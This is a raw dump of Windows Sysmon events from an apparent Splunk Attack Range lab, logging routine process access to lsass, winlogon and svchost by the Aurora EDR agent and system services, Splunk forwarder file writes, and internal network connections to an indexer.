Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016268Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.647{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016267Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.613{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016266Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.592{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016265Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.570{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016264Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.557{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016263Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:22.553{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 354300x800000000000000016262Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:19.081{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50088-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000041593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:22.018{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1485A372E8A2FBE138947DD29CFFA227,SHA256=BF2D59B860B2C0812BAF6F51200AD81DF922BEE65D6007F6D7DC92ADD8FC1BAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016294Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:23.548{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8014F59D8C1B2121C1A1A0448B8811F4,SHA256=3B59831429E172A879CC1660405DFAE508249CECDA975D77E85CA28BE688EA36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:23.127{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3DA6CE83FFBACEF03B369BEE33A68F3,SHA256=7A774C6B91D4BBC8A760CC256D6B2E21E0A7179542DD5FFE5E8A80B7E7073295,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016295Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:24.559{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2571D64033F915A5AB7DD53ABE58BF78,SHA256=7FB0CF605FA211F2EF6F2430BE263ED81C1FB51155D93916C2E86CCAE3102F8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:22.640{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56289-false10.0.1.12-8000- 23542300x800000000000000041595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:24.227{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=118C0284F9C1A2AAD7BA028EE2241B70,SHA256=6C3249EBAC9EE400F2E37CDDCA56324BB7AE10FAED6E41635118D8E4DEA14EDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016300Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:25.667{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016299Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:25.667{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016298Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:25.667{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016297Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:25.653{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016296Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:25.646{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB318CA47443B104CC7294EA743D1074,SHA256=3B23182E561C266EB10ACA52C9DDFC5F515A09B527E206218B02C5E2718CDE3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:25.328{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10C31FBEFE809E40179E403C7047DBDB,SHA256=5F9E4956BDFD87433AB415982349961DE31F546122828F0B5F2859E98182AED4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016302Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:26.724{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29EA3BB28D683474AE0AEC0205C991B3,SHA256=1215A1BDBD19F79D746B28E285B681C335F9C111B83A871FFD941DC67C348A99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:26.528{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C384E6AE49E6D5EA161120D6F2651DE4,SHA256=96C3723220C3A7853C9D0EBB5C3CCBB710097D31BCE2B87BC3C2FE636E4A0A7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:26.434{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF531985B8F6CC0B71E6A1067DD1F429,SHA256=83C7722B59D2CEDF894875EFB741F16CC708A268505F447DFBC8B70B514CC0CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016301Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:24.084{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50089-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016303Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:27.810{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8001985AE08626321910976B9F7F67D2,SHA256=D23A583D67E3F31428CD0E1CCB28C3547445CC248253012D742885800675B56E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:27.575{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:27.543{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E198362645EBFAB5ED8FBE6AF374EFA1,SHA256=0DD1C0B6E36619E34BACAA45CF490FD9E5F8B6A2DAE7B107598D4586BFFC709E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016304Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:28.896{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96047CBD996C683A25C2A237CC35BF66,SHA256=B9B887EBF797AEFE5F1A04A4D78C692A91BBE5D951D01128EDC05E8B22C6F98A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.964{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E448-63C7-2006-00000000AF02}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.959{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.959{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.959{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.959{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.959{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E448-63C7-2006-00000000AF02}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.959{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E448-63C7-2006-00000000AF02}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.960{FE4C2B44-E448-63C7-2006-00000000AF02}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program 